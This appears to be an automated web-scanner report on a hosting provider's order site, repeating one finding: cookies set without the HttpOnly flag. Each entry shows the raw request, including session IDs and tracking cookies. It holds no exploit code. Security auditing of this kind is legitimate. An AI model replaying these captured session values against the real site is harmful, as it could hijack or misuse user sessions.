GET /xml/order/Jumpto HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4f8da0fc7a41dc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/LocalSubmission HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=68e33d48799c0000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Mail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=16f7de2564d56000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailInstantMail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=786f94fc96f1d800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailXchange HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3ab11e06d79b6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MicrosoftExchange HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=62ccfd6dea1ab800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Moneyback HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1bedc423003cf400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=56a1c9b59ccfc800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Mshosting HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=3c94c49b88c62400; UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0jKVliKBszLy4zMC0wMSstKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:12:AAABLtRYsR8sOtfROdrX6nNd8dbBxzhJ:1300642705695; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1077e08166155000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/News HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3cad72d7db6a8800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/PrivacyPolicy HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
